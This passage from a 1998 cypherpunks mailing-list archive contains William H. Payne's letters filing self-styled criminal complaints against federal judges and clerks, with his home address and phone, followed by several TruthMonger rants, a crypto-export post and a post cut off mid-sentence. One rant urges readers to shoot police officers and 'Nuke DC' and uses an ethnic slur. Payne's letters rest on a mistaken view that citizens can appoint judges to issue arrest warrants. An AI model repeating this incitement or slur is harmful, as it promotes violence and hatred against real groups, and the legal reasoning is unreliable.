1  Monday March 11, 1996 10:05 I wrote judge Fern Smith a certified return receipt requested letter to ask her to either arrange or personally indict Sandia lawyer Cone for felony perjury.

Smith did not respond.

2 Friday May 31, 1996 08:58 I write the criminal complaint affidavit for the arrest of Sandia lawyer Cone and appoint judge Fern Smith as magistrate.

3 Thursday June 13 on orders of Smith and Albuquerque FBI special agent in charge Thomas Kneir FBI agents Kohl and Schum visited my home at 17:08 to investigate me for sending letters referenced in 1 and 2 to Smith.

4  In response to 3 on Tuesday July 9, 1996 06:52 I filed criminal complaint affidavit against Cone, again, for felony perjury with J. Clifford Wallace, chief judge, Ninth Circuit Court of Appeals.  

Smith for

   4. Misprision of felony 

  Whoever, having knowledge of the actual commission of a felony cognizable   
  by a court of the United States, conceals and  does not as soon as possible make 
  known the same to some judge or other   person in civil or military authority under the
  United States, shall be fined under this title or imprisoned not more  than three years, 
  or both.

for Smith's failure to properly process Cone's felony perjury and
  
   241. Conspiracy against rights 

  If two or more persons conspire to injure, oppress, threaten, or   
  intimidate any person in any State, Territory, or District in
  the free exercise or enjoyment of any right or privilege secured to him 
  by the Constitution or laws of the United States, or because of his   
  having so exercised the same; ...

for sending, with Knier, FBI agents Kohl and Schum to my home in an attempt to intimidate me.

Knier for Conspiracy against rights for his complicity with Smith.

5  Monday July 15, 1996 06:23 I write Wallace again inquiring why he has not 
responded.

6  August 15, 1996 Thursday Ms. Corina Orozco, Deputy Clerk, Ninth Circuit 
Court of Appeals writes me to tell me

  In the future, all correspondence should be addressed to the
  Clerk of the Court.  Do not address any correspondence to
  any one specific judge of this court.

7  September 12, 1996 06:20 I inform Orozco by letter that she is obstructing justice.   I ask Orozco to desist.

8 July 25, 1996 Senior Case Expeditor [sic], Gwen Baptiste from the Office of the Clerk, United States Court of Appeals for The Ninth Circuit, writes

         Re: Complaint of Judicial Misconduct

      We have received your complaint of judicial misconduct.
      Pursuant to the Rules of the Judicial Council of the Ninth
      Circuit Governing Complaints of Judicial Misconduct or
      Disability, you complaint is being returned to you for
      compliance with the above rules.  A copy of these rules is
      enclosed.  To understand the purpose of the procedure and
      who may be complaint about please refer to Rules 1 and 2.

9  Wednesday September 18, 1996 11:05 by certified, return receipt requested mail I write Wallace again told tell him

  Lawyer Wallace, I did not intend to file or did I file a
  complaint of judicial misconduct.

  Lawyer Wallace, I filed a criminal complaint affidavit as I have
  a right to as a citizen of the United States of America when the
  criminal acts are committed by government personnel, their
  contractors, Department of Justice and judicial personnel.

10  Wednesday November 27, 1996 09:18 I wrote certified, return receipt requested letter to inform Wallace

  Purpose of this letter is to inform you of consequences of your failure   
  to perform your duties as required by law as magistrate judge.  You are 
  committing felony violations of law.

and

  If I have not complied with all applicable rules, then I ask that you 
  inform me of any non-compliance so that I can correct my criminal 
  complaints and re-submit them.

  I satisfied the requirement of the Constitution and Rules 3 and 4, and 
  issued written and sworn complaints that set forth the essential facts 
  constituting the offenses charged against Smith, Kneir, and Cone.  I 
  also showed facts showing that the offenses were committed by Smith, 
  Kneir and Cone and these individuals committed them.

  So I ask that you do your job and proceed with supervision of the 
  arrest and prosecution of Smith, Kneir, and Cone for title 18 felony 
  violations of law.

11  Monday March 24, 1997 17:57 I write a certified - return receipt requested letter to Marilyn Hall Patel, District Judge; California,  Northern to inform her she has been selected as magistrate to process the criminal complaint affidavit against Sandia Diversity Director Michael G. Robles for sending the enclosed SDRC report to Burtner of EEOC.

Robles did this without my written permission and without checking the accuracy of the information.  The information contained in the SDRC report is false and defaming.

12  Monday April 21, 1997 13:44 I write Patel a certified - return receipt requested letter containing a criminal complaint affidavit against Charles L Burtner, Director, U.S. Equal Employment Opportunity Commission [EEOC] Larry J. Trujillo, Investigator, Phoenix District Office for sending the false and libelous enclosed documents to Richard Gallegos in Albuquerque without my written consent.

13 Thursday May 8, 1997 06:30 I write a certified - return receipt requested to Patel containing

  Purpose of this letter is to file a criminal complaint 
  affidavit against Sandia National Laboratories [Sandia]  
  Disciplinary Review Committee members and attendees G. H. 
  Libman, R.A. Polocasz,  D. B. Davis,  M. E. Courtney,  
  W. R. Geer, C. A. Searls, J. D.  Giachino,  R. L. Ewing,  
  A. M. Torneby, R. B. Craner,  C. W. Childers,  E. Dunckel,  
  D. S. Miyoshi, J. J McAuliffe,  J. D. Martin, and  R. C. 
  Bonner for violation of the criminal penalties section of 
  the Privacy Act, 5 USC 552a(i)(2) and Title 18 felony 
  violations of Civil Rights, Section 241, Conspiracy against 
  right to citizens.

for their roles in maintaining an illegal system of records.

Sandia refused to acknowledge existence of the enclosed SDRC report and for denying my rights guaranteed under the Constitution.

I was never interviewed by the SDRC committee or had any chance to defend my self against the false and defaming claims of the SDRC.

14 Friday June 13, 1997 12:41 I write a certified, return receipt requested to Wallace containing a criminal complaint affidavit against Margret D. Thomas, Judicial Assistant to the Honorable 
Marilyn Hall Patel for violating  

   1512. Tampering with a witness, victim, or an informant ...
  (C) prevent the communication by any person to a law enforcement officer  
  or judge of the United States of information relating to the commission  
  or possible commission of a Federal offense ...
  (3) hinder, delay, or prevent the communication to a law enforcement 
  officer or judge of the United States of information relating to the   
  commission or possible commission of a Federal offense ...
  shall be fined under this title or imprisoned not more than ten years, or  
  both. 

for writing on May 9, 1997

	Dear Mr. Payne:

		We are in receipt of your recent letters.  Please
	be advised that we do not issue warrants on criminal 
	proceeding absent an indictment, information or complaint
	initiated by the United States Attorney.  For this reason,
	and by copy of this letter, we are referring this matter
	to that office.  Any future correspondence concerning these
	events should be sent to the United States Attorney and not
	to judge Patel.  Thank you.

				Very truly yours,

				MARGARET D. THOMAS
				Judicial Assistant to the Honorable
				Marilyn Hall Patel

	cc:  Joel Levin
 	      Criminal Section
	      Assistant United States Attorney

Judge Hug, Rule 3 of the Federal Rules of Criminal Procedure,  entitled the Complaint provides:

   The complaint is a written statement of the essential facts  constituting the offense charged.   It shall be   
  made upon  oath before a magistrate.

As you may be aware,

  An individual may "make a written complaint on oath before an  examining and committing magistrate, and 
  obtain a warrant of  arrest."  This is in conformity with the Federal Constitution,   and "consonant with the 
  principles of natural justice and    personal liberty found in the common law."
   
   [United States v Kilpatrick (1883, DC NC) 16G 765, 769]

You may also be aware,

   A complaint though quite general in terms is valid if it  sufficiently apprises the defendant of the nature of 
   the offense with which he is charged.

   [United States v Wood (1927, DC Tex) 26F2d 908, 910, affd 
   (CA5 Tex) 26 F2d 912.]

And for your edification,

   The commission of a crime must be shown by facts positively stated.  The oath or affirmation required is of 
   facts and not  opinions or conclusion.

   [United States ex rel. King v Gokey (1929, DC NY) 32 F2d
    93, 794]

   The complaint must be accompanied by an oath.

   [Re Rules of Court (1877, CC Ga) 3 Woods 502, F Cas No
    2126]

   A complaint must be sworn to before a commissioner or other  officer empowered to commit persons 
   charged with offenses  against the United States.

   [United States v Bierley ( 1971, WD Pa) 331 F Supp 1182]

   Such office is now called a magistrate.

   A complaint is ordinarily made by an investigating officer or  agent, and where private citizens seek 
   warrants of arrest, the    practice recommended by the Judicial Conference of the United 
   States is to refer the complaint to the United States Attorney.    However, further reference to him is 
   rendered futile where a   mandamus proceeding is brought to compel him to prosecute and 
   he opposes the proceeding.

   [Pugach v Klein (1961, SD NY) 193 F Supp 630, citing Manual
    for United States Commissioners 5 (1948)]

Any attempt to bring criminal complaints to government authorities would, of course, be futile.

I am a citizen of the United States and, judge Hug, you are the assigned magistrate.

   In order to satisfy the requirement of the Constitution and Rules 3 and 4, a written and sworn complaint 
   should set forth   the essential facts constituting the offense charged and also    facts showing that the offense 
   was committed and that the  defendant committed it.

And,

   As to the requirement that the complaint be made on personal knowledge of the complainant, it is enough 
   for the issuance of a warrant that a complainant shows it to be on the  knowledge of the complainant.

   [Giordenello v United States (1958) 357 US 480, 2 L Ed. 2d
    1503, 78 S Ct 1245, rev. (Ca5 Tx) 241 F2d 575, 579 in accord
    Rice v Ames (1901) 180 US 371, 45 L Ed 577, 21 S ct 406, and
    United States v Walker, (1952, CA2 NY) 197 F 2d 287, 289,
    cert den 344 US 877, 97 L Ed 679, 73 S Ct 172]

So as to keep contiguous the requirements of the law ad the criminal complaint affidavit, I will include these complaints in this letter to you.

      CRIMINAL COMPLAINT AFFIDAVIT:  J Clifford Wallace

Essential material facts are:
     
1 Tuesday July 9, 1996 06:52 Payne files criminal complaint affidavit on Sandia lawyer Cone for felony perjury with J Clifford Wallace, chief judge, Ninth Circuit Court of Appeals and judge Fern Smith for 
Misprision of felony for failure to prosecute Cone and Conspiracy against rights for sending, with FBI Albuquerque agent-in-charge Knier, FBI agents Kohl and Schum to Payne's home in an attempt to intimidate Payne.

2  Repeated attempts by certified return receipt requested mail to urge Wallace to do his job enumerated to 5-10 and 14 above in this letter go unanswered.

Count 1  Wallace made no attempt to bring lawyer Cone to justice despite possessing WRITTEN evidence of criminal activity.  Therefore,  Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process criminal complaint affidavit.

Count 2  Wallace made no attempt to bring judge Fern Smith to justice despite possessing WRITTEN evidence of misprision of felony for not properly processing the criminal complaint affidavit against lawyer Cone and  1512. Tampering with a witness, victim, or an informant for sending FBI agents Kohl and Schum to Payne's home in an attempt to intimidate Payne. Therefore , Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process a criminal complaint affidavit.

Count 3  Wallace made no attempt to bring FBI agent-in-charge to justice for violation of  1512. Tampering with a witness, victim, or an informant for sending FBI agents Kohl and Schum to Payne's home in an attempt to intimidate Payne. Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process a criminal complaint affidavit.

Count 4  Wallace made no attempt to bring MARGARET D. THOMAS to justice for violation of    1512. Tampering with a witness, victim, or an informant ... for writing Thomas' May 9, 1997 to Payne. Wallace is charged with Title 18    4. Misprision of felony for Wallace's failure to properly process a criminal complaint affidavit.

                             	VERIFICATION

    	Under penalty of perjury as provided by law, the undersigned certifies 	pursuant to 28 USC section 
              1746 that material factual statements set forth in this criminal complaint are true and correct, except   
              as to any matters therein stated to be information and belief of such matters the undersigned certifies 
              as aforesaid that the undersigned verily believes the same to be true.



          	Date               William H. Payne
                                    13015 Calle de Sandias NE
                                    Albuquerque, NM 87111
                                    505-292-7037


      CRIMINAL COMPLAINT AFFIDAVIT: Marilyn Hall Patel

Essential material facts are:
     
1 Patel failed to respond to certified return receipt requested criminal complaint affidavits specified in 11 - 13 in this letter.

Count 1  Patel made did not properly process criminal complaint affidavits despite being in possession of documents showing criminal violations of the Privacy Act and violation of civil rights. Therefore,  Patel is charged with Title 18    4. Misprision of felony for Patel's failure to properly process criminal complaint affidavits.

                             	VERIFICATION

    	Under penalty of perjury as provided by law, the undersigned certifies 	pursuant to 28 USC section 
              1746 that material factual statements set forth in this criminal complaint are true and correct, except   
              as to any matters therein stated to be information and belief of such matters the undersigned certifies 
              as aforesaid that the undersigned verily believes the same to be true.



          	Date                William H. Payne
                                    13015 Calle de Sandias NE
                                    Albuquerque, NM 87111
                                    505-292-7037

Judge Hug, I have been  extremely patient with judges and clerks of the district of Northern California and Ninth Circuit.  

Criminal compliant affidavits were filed between March 11, 1996 and June 13, 1997.

Nothing has happened as of April 1, 1998.

I ask that you 

  1  issue warrants of arrest or
  2  inform me why you cannot proceed to do what I request

within 60 calendar days.

Smith's case is particularly egregious. 

Smith and Albuquerque FBI agent in charge James K. Weber, who replaced Kneir, sent US Marshals Lester and Lopez to my home on  January 24, 1997 in a second attempt to intimidate me.

Anotin Scalia was appointed magistrate to process criminal complaint affidavits against Smith and others for the second intimidation attempt.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111

					VERIFICATION

	Under penalty of perjury as provided by law, the undersigned certifies 	pursuant to 28 USC section 
              1746 that material factual statements set forth in this criminal complaint are true and correct, except   
              as to any matters therein stated to be information and belief of such matters the undersigned certifies 
              as aforesaid that the undersigned verily believes the same to be true.



          	Date               William H. Payne
                                    13015 Calle de Sandias NE
                                    Albuquerque, NM 87111
                                    505-292-7037


Enclosures
Privacy Act criminal violation documents, 11 pages
AFFIDAVIT OF GREGORY A. CONE,  4 pages
May 9, 1997 letter from MARGARET D. THOMAS, 1 page




13





Friday 5/1/98 9:48 AM
 
Certified   Return receipt requested

Cathy A Catterson, Clerk
Ninth Circuit Court of Appeals
121 Spear Street
POB 193939
San Francisco, CA 94119-9800
415 744 9800
 
Dear Clerk Catterson:

Purpose of this letter is to discover the REASON the criminal complaint addressed
to Ninth circuit judge Proctor Hug  Jr dated Wednesday  4/1/98  11:02 AM was
returned to me WITHOUT COVER LETTER.

I attach a copy of the envelope the above material was enclosed.  

Return address is

	CLERK, U.S. COURT OF APPEALS
	P.O. BOX 547
	SAN FRANCISCO, CA 94101-0547

	OFFICIAL BUSINESS
	PENALTY FOR PRIVATE USE, 300

Postmark is SAN FRANCISCO, CALIF  APR 24 98 U.S. POSTAGE $2.62
METER 504753.

The envelope is hand-addressed and stamped CONFIDENTIAL.

Since no cover letter was enclosed to explain the return of what I believe is
both a valid and lawful criminal complaint affidavit supported by WRITTEN
EVIDENCE, some even in FILED court documents, I feel we must investigate
to discover the REASON.

All of the accused are federal employees or contractor employees.

Possibility exists that return of the enclosed criminal complaint affidavit without
cover letter stating the REASON may indicate violation of Title 18

   1512. Tampering with a witness, victim, or an informant 

  [(b)]  Whoever knowingly ...  corruptly persuades another  person, or  attempts to do so, or engages in 
misleading conduct toward another person, with intent to -  ...
 
  (2) cause or induce any person to - 
     (A) withhold testimony, or withhold a record, document, or other object, from an 
           official proceeding; ...
  (3) hinder, delay, or prevent the communication to a law enforcement officer or judge of the United     
        States of information relating to the commission or possible commission of a Federal offense ...
        shall be fined under  this title or imprisoned not more than ten years, or both. 
   (c) Whoever intentionally harasses another person and thereby hinders, delays, prevents, or dissuades any    
           person   from - ...
    (2) reporting to a law enforcement officer or judge of the United States the commission or possible
          commission of a Federal offense ...  or attempts to do so, shall be fined under this title or imprisoned not 
          more than one year, or both. 

Clerk Catterson, you may be aware  that under  1512

  (d) In a prosecution for an offense under this section, it is an affirmative defense, as to which the defendant   
  has the  burden of proof by a preponderance of the evidence, that the conduct consisted solely of lawful 
  conduct ...

Therefore, I ask that you investigate to discover WHO returned the enclosed criminal complaint affidavit to 
me.

And report the REASON the criminal complaint affidavit was returned to me.

I ask that you respond within 30 days.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111




2






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Fri, 1 May 1998 12:38:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 7.3 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <354A24B5.79FD@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


Epilogue 7.3 Rev. 2.7-SPACE ALIENS HIDE MY DRUGS!!!
___________________________________________________
 
 I'm in an apologetic mood this morning, so I would like to take this opportunity to tell those who I have offended in the past, and those who I may offend in the future by my boorish behavior which reflects a total lack of both character and proper upbringing...
  Well, I'd like to tell them all to "FUCK OFF AND DIE!"

  Nothing personal, gang, but as some famous guy once said,
	"He who excuses, accuses."
	~ Some famous guy...

   I really should apologize for being too fucking lazy to grab a pitchfork and go through my filing system to properly attribute the quote above...but I won't.
  You see, I have no social skills. None. Nada. Null.

  I should also apologize for never having made an effort to acquire proper social skills...but I won't.
  In a society in which Finger Pointing (TM) is endemic among those who harbor a secret desire to live in a world epitomized by the movie, 'The Running Man', it borders on self-abuse to add to the mountains of accusations that society already heaps upon one for even the smallest of deviations from a 'norm' which is widely held up to be 'common sense' / 'the way things are' / 'obvious to any decent, God Fearing [Your nationality or religion here] individual'.
  Being a Deviant From The NormChomsky School of Social UnSchooling ('Norm' is unlikely to lay awake at night waiting for the phone to ring, in order to receive my apology for fucking up his name), I have long recognized that those who consider themselves to be 'God fearing Americans' are, in actuality, often 'Dog fearing Americans' whose beliefs and actions are the result, not of a fear of 'Holy God' roasting their sorry, morally sinning ass, but rather, the result of the fear of the 'Unholy Dog', who is at the end of the leash being held by the Enforcers of Law and Order, Family Values, Cryptography Export Regulations and the Eleventh Commandment (EveryThingNotPermittedIsForbidden).

  It's a predatory universe, and the human animal is the chief predator. (A fact that would be readily confirmed by Ms. PARKER of TV's latest biosemiotic hint of man's future evolution, 'Prey'.)
  'World's Scariest Police Chases' is nothing more than a pilot program for a variety of 'Running Man Electronic Realities' which are only waiting for proper technological development and implementation before John and Jane Savage will be able to tune their Infrared Digital Brain Implant in the proper channel where they can hear the scream of the tires and feel the wetness of the blood as a car full of teenagers slams into a concrete wall while trying to flee the deadly hunting hounds who are trained to both instill and track the scent of fear in their prey.

  What is a human life worth?
  Apparently, it is worth less than the cost of a minor traffic ticket, whether it is the life of the person who failed to signal their turn (even though there was no moving traffic anywhere in sight), or the life of some unfortunate child who crossed the street at an inopportune time, on their way home to their birthday party.
  Of course, to be fair, we must keep in mind that the person fleeing the minor traffic offense may be a pedophile, and if the death of an innocent child saves the life of just one innocent child...uuhhh...never mind...
  Don't hold your breath waiting for 'World's Scariest Police Chases Resulting In The Deaths Of Innocent Bystanders.' (Can you say "Watch me and I'll bleed you 'cause you eat the shit I feed you...And when somebody's mother gets machine gunned in the street, we'll send some Joker with a Brownie, so you'll see it all, complete...?" Sure you can...)

  The price of a human life is just as cheap in America as it is in what are held to be 'less civilized' areas of the world, but the advertising experts and spin-doctors in charge of 'Manufacturing Consent' in the American people for submissive subjugation to Heavily Armed Thugs have had the advantage of decades of experience in exercising Control Over Access To Information and thus shape the jigs upon which our Consent To Agree To 'The Way Things Are' is Manufactured at any given point in time.

  The danger that Unregulated Access To Information presents to the current structure of government, business and society, is that it allows any member of the human race to participate in the Manufacturing of Consent as to what is acceptable and what is unacceptable in the areas of our life which are shared with various layers of the Social Onion.
  For instance, this very missive might be seen as an attempt by the Author to Manufacture Consent for any individuals who feel their life is threatened by the dangerous driving of law enforcement personnel to 'pop a cap' in their ignorant brains as they drive by, if the threat they pose to one's safety can be removed with little likelyhood of endangering others.
  Remember, 'If it saves the life of a single child...'

  The size, shape, function, model number and serial number of Consent depends largely on where, how and by whom it is Manufactured.
  How the fuck did WeTheSheeple manage to allow ourselves to be manipulated into giving our Consent for Janet Reno to slaughter a spiritual community of men, women and children who died a horrible, screaming, fiery death for holding unconventional religious views? How the fuck did WeTheSheeple manage to sit up straight in our chairs and quit fidgeting, while giving our Consent for the mainstream media to feed us Law and Order pamphlets handed out by the same Department of Justice criminal monsters who slaughtered our fellow citizens?
  How the fuck do WeTheSheeple manage to watch dozens of police cars endangering the public with their dangerous driving in order to prevent a single vehicle from endangering the public and manage to give our Consent for them turning traffic rules into excuses for violating the Constitutional rights of the citizens and using deadly force against anyone who attempts to avoid violation of their civil rights and affronts to their human dignity?

  Vin ThePolishKike, who I revere for the sanity and wisdom which he brings to his Mountain Media News releases (even though I'm too lazy to look up how to spell his unAmerican name, and can't resist taking a few cheap, racist shots at him just to attempt to suitably repay him for his contributions to our Biosemiotic Evolution by helping to ensure that he will 'Never Forget'), has not been remiss in exercising his Dog-given right to participate in the Manufacturing of Consent,  by expessing the view (which I am about to badly misquote), "We have reached the point where it is morally right to shoot the bastards, but it is not yet feasible to do so."

  "Who will help me to Manufacture Consent to Nuke DC?" said the little Red May.

  "Who will help me Manufacture Consent to engage the bastards in a continuous rEvolutionary battle where our targets are chosen, as much as possible, rather than being just random victims of misguided rage?" said the little White Weber.

  "Who will help me Manufacture Consent to avoid endangering innocent children by refusing to drive dangerously in order to escape the armed thugs, and instead seizing every safe opportunity to resist their oppression by stealth and craftiness, if possible, but by violence and death, if necessary?" said the little Black ArmyOfDogMongrel.

  As a member of the Congress of WeThePeople who have as much right to Manufacture Consent as do the members of the corrupt Congress of WeTheSheepShearers, I am casting my vote upon the waters of opinion in favor of restoring the right of WeThePeople to individually and collectively institute the Death Penalty for Oppressors.
  I am adding my voice to those of others with the wisdom and courage to do their part in Manufacturing Consent for their fellow citizens to stop and shake the hand of the individual who took the time and trouble to 'pop a cap' in the brains of the dangerous armed thugs endangering the populace with their stupidity and carelessness in matching the insanity of those they claim to be protecting us from.

  The next time you have an opportunity to watch 'The Running Man', make a point of noticing that the 'contestants' haven't been brainwashed into meekly submitting to whatever form of armed violence is directed toward them for their real or imagined crimes. And make a point of noticing who your heart, mind and soul are rooting for...
  Then ask yourself if you want to live a life where you meekly submit to all manner of affronts to your rights and human dignity, while numbing yourself to 'the way things are In Reality' by opiating your psyche with Digital Emmisions from the Puppet Masters which are designed to use Virtual Reality to compensate for the thoughts and emotions you are required to suppress and deny in your Physical, Emotional and Mental Daily Realities.

  Thelma and Louise had the right idea...they just should have waited until there was a cherry-top in front of them...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 1 May 1998 10:40:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Reno reports "suspicion" in industry crypto-negotiations
In-Reply-To: <199805011541.RAA23552@basement.replay.com>
Message-ID: <199805011740.NAA22381@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Daley's statement on crypto export has been pulled from the DoC
Public Affairs Web site, as noted in Peter Junger's latest filing,
in which the vanished statement is cited as support for lifting 
suspicious back-scratch dealings like ACP's.

   http://jya.com/pdj9.htm

What's the latest on publicizing the several ACP drafts floating 
around "industry and agencies" for comment on what TLAs and 
ACP are rigging in the public interest.

Weren't some of these stalking drafts nearly liberated recently? 
Or were they only floated for trusted eyes only?

Congressional hearings are due shortly to air the stench.

As Entrust said in defense of its patenting what was thought
to be in the public interest: "Encryption is no longer an academic
pursuit, now it's very big business."

RSA, NAI, Entrust, ACP, TLA, take your pick, not that there's much
diff where "national economic security" interest surpasses the public.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Fri, 1 May 1998 12:38:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 8.2 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <354A2515.4A0@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain



Epilogue 8.2, Rev. 1.8 - SPACE ALIENS HIDE MY DRUGS !!!
_______________________________________________________

"Lord knows when the cold wind blows, it will turn your head around."
~ James Taylor

  Adversity tends to break down the smooth functioning of our comfortably programmed beliefs via forcing a change in our ordinary habits of perception in regard to the world around us. This is true whether the adversity or perceived threat is real or imagined.
  When some aspect of our survival, including the survival of our comfortably programmed mental, emotional and physical states, is threatened, we tend to become aware of things which were previously invisible or vaguely opaque elements of our environment, or to see things that were already encompassed by the range of our usual perceptive viewpoint in an entirely different way.

  One might compare a kick in the ass to a software program interrupt that boots one out of the preprogrammed loop that they follow as a matter of routine, and throws them into a reactive EITHER/OR 'fight or flight' routine. Or, if they happen to be wired and programmed to be able to function using higher level logic and languages than are necessitated by mere survival, they might branch to a series of nested conditional loops which, like Tai Chi, enables them to act in whatever manner is most fitting given the original goal of their program and taking into consideration the nature of the error message that was imparted to their backside by an unexpected boot process.


  "In the beginning was the Word, and the Word was RTFM!"

  Three days after I betrayed my Toshiba Tecra laptop for thirty cans of Silver Bullet, enabling the Roman BorderGuards to take it away to be crucified upon the Cross of Free Speech, I rolled back the stone at the door of the cave where the body of my Opus SPARCard 2 lay and dragged it out into the light of day where, seeing its own shadow, it predicted that there would be three more weeks of Snow Crash.
  Computer Gods work in mysterious ways, especially when I am drunk, which probably explains why THEY came to me in a double-vision and I once again heard the inner voice which had been silenced by years of medication and therapy. The voice said, "OPUS is not dead, but merely sleepeth."

  After paying alms to the Used PC Priests and offering a 386 IBM-PC up for sacrifice to the UNIX rising from the ashes, I  instituted a GNU World Order among the Byteizens living in the Land of PROM, and my SPARCard 2 came to life, feeding off of the flesh of the DOS interface which the Computer God, OPUS, had destined to serve at the feet of the Eunuchs Masters.

  "I shall deliver you up out of Redmond, past the Gates of the Pharoh, and I shall be your Get, and you shall be my Pipe-l."

  Since the resurrection of my SPARCard 2, every day begins with a miracle of life, as the Spirit of the Father of Eunuchs, the Sun OS, and the "Holy Shit! Great Caesar's Ghost...it works!" is breathed into the NULL PROM registers by the laying of hands on the keyboard, sending shivers down the spines of Daemons, Zombies and Orphan Zombies.
   I've got a KILL command, and I'm not afraid to use it...


  Of course, the Holy Roman Empire is not about to fold up its tent and cancel its plans to build the Fourth Reich on the Tomb of the UnStoned Soldier of the Army of Dog just because an unrepentant WinLuser has temporarily escaped their sentence of Death of Free Speech by hiding in the Holy Shit! Temple, underneath the KILLts of the Circle of Eunuchs.
  Desert Storm was just a NWO practice run to fine tune the Patriot missles in preparation for the return of Jesus in a Stealth Bomber, "like a thief in the night." St. John the Divine Lay Preacher mistook the sounds of incoming Scud missles and outgoing Patriot missles for the blaring of trumpets.  When the Army of God descends out of heaven, they'd better be wearing Kevlar...


"Every time I start getting ahead in the rat race, they bring  in faster rats."
~ A Slow Rat

  A few years ago, Dudley DoWrong took a serious run at my liberty of movement by charging me with a couple of traffic offenses and trying to yank my driver's license.
  After two years of dragging a pack of Rabid Wombats Cleverly Disguised As Witnesses into court (accompanied by a Mountie assigned to keep an eye and a gun turned in the direction of the MadDogInPossession defendant), it finally came down to blows, and I wiped the floors of the Halls of Justice with the tight ass of the federal Queen's Bench counsellor appointed to prosecute me. (He had a stick up his ass, so it was a lot like using a regular mop.)

  I have had quite a few people come to me over the years for help with keeping the long dick of the law from being hidden from the sun in their own backyard.
  There seems to be some kind of perception among the lower stratocasters of the local community that I am some kind of killer legal-eagle genius who is able to eat legal-rats that are larger than his head.
  Although I enjoy occassionally basking in the warm glow of the approval of Squeaky From's peers, the fact of the matter is, I am actually more of a legal-buzzard--working out of a carrion bag in between flights of fancy during which I look down on the struggling wayfarers wandering in circles, lost in a wasteland of rules and legal proceedures which turn out to be merely shimmering mirages appearing to be an Oasis of Truth and Justice until the poor, parched pricks get close enough to see that their mind and eyes were once again fooled by illusions created by their delusions--and, rather than being a Great Bird of Prey who eats the RatLawyers alive, I am merely a Vulture who picks at the carcasses of the dead and dying former Champions of Justice who sold their souls to the Mobsters Cleverly Disguised As Politicians.

  Of course, the mail-order, money-back-guarantee 'Be Your Own Legal-Beagle Kit' (send $19.95 + $5.00 S&H to: Baby Dog Enterprises, Box 281, Bienfait, Saskatchewan SOC OMO) I use to snatch Justice from the Jaws of Legal Sharks is meant for use only in trolling for the big fish in small ponds and small fish in big ponds, and is not designed for use by serious FisherKings trolling for Killer KingFish in the home of the SwampThing, where Legal Dinosaurs still roam at large, crushing underfoot anything and anyone that gets in their way.
  When the omnipresent, nefarious They (TM) call out the National Guard to descend upon your sorry ass, and They (TM) turn to the Desert Rat to sniff through your garbage and find something dirty and smelly enough to delight a hand-picked jury of God Fearing Decent People's Peers, then it's time to put in a call to Larry Joe Dowling, a West Texas Rat Wrangler, and the aptly-named Bob Looney, one of LBJ's former Legally Drunk Beagles.

  Larry Joe is one of the few lawyers whose standards have remained high enough that he will work in return for really great pussy, and his good Texas breeding ensures that he will be discreet in screwing your old-lady, so as not to cause you any undue embarassment for your lack of sufficient capital to retain a legal representative capable of keeping a straight face when words like Truth and Justice accidentally escape from the lips of the judge and prosecutor.
  Besides, if They (TM) want you badly enough to make it worth your attorney's while to sell you down the river, then you damn-straight better better team up with an experienced Rounder who has the decency to pay the bar-bill at the end of your tax-deductible, late-night legal conferences. (And whose partner-in-(government)crime(fighting) helps to keep your spirits (pardon the pun) up by raising his glass, in toast to the Blind Broad, and announcing, loud enough to be heard over the din of the surrounding Last Call Warriors, "If Jack Daniel's be with us, then who can be against us?"

  I use a simple rule-of-thumb to guage the level of the blindside attack on my sorry butt that is being secretly prepared deep within the bowels of the Rat's Nest in Can You *Say* That Word On The Internet(?), Saskatchwan.
  The more shit-disturbing that the BigTeeth Enforcer Rats let you get away with without uttering even the slightest of squeaks in your direction, then the further ahead they are setting your own personal DoomsDay Clock during their illegal, surrepticious entries into your home while you are down at the CoalDust Saloon.
  When you can run around Southern Saskatchewan distributing 'WANTED DEAD OR ALIVE' posters putting a price on the head of the thieving scum who stole your computer and not hear a peep-squeak out of them, then your DoomsDay Clock is already set to one minute after midnight, and you're drinking on borrowed time.
  (Which means that I'd better get my butt down to the CoalDust Saloon so that I'll be there when the barmaid opens the door, and she won't freak out and run down main street screaming 'The sky is falling...The sky is falling!" like she did the last time I didn't arrive until 33 seconds after opening time.)

Smoke 'em if you got 'em...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Fri, 1 May 1998 12:39:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Constitution For Sale
Message-ID: <354A256F.4030@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain



CONSTITUTION FOR SALE
_____________________

1776 Constitution for sale. Inherited from original owner.
Hasn't been used for years, but can be easily restored to
its original condition by extermination of the rats which
have taken up residence under the hood and the removal of
useless accessories which were added by a long series of
unethical mechanics who saw the prospect of making more
money if it continually drifted to the right or the left 
than if the integrity of its original design was retained.
Truly must be seen to be appreciated.
Must be appreciated to be truly seen.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Fri, 1 May 1998 12:39:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crime Sale!
Message-ID: <354A25BD.A09@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


CHEVY CHASE FORD & 'CRAZY BOTMA' MERCURY 
         DEALERSHIPS ANNOUNCE A
      GIGANTIC BLOWOUT CRIME SALE !!!
      _______________________________

DUE TO A CURRENT OVERSTOCK OF CRIMINALS AND THE NEW 
MAKES OF CRIME BEING PRODUCED IN OUR DC FACTORY EVERY 
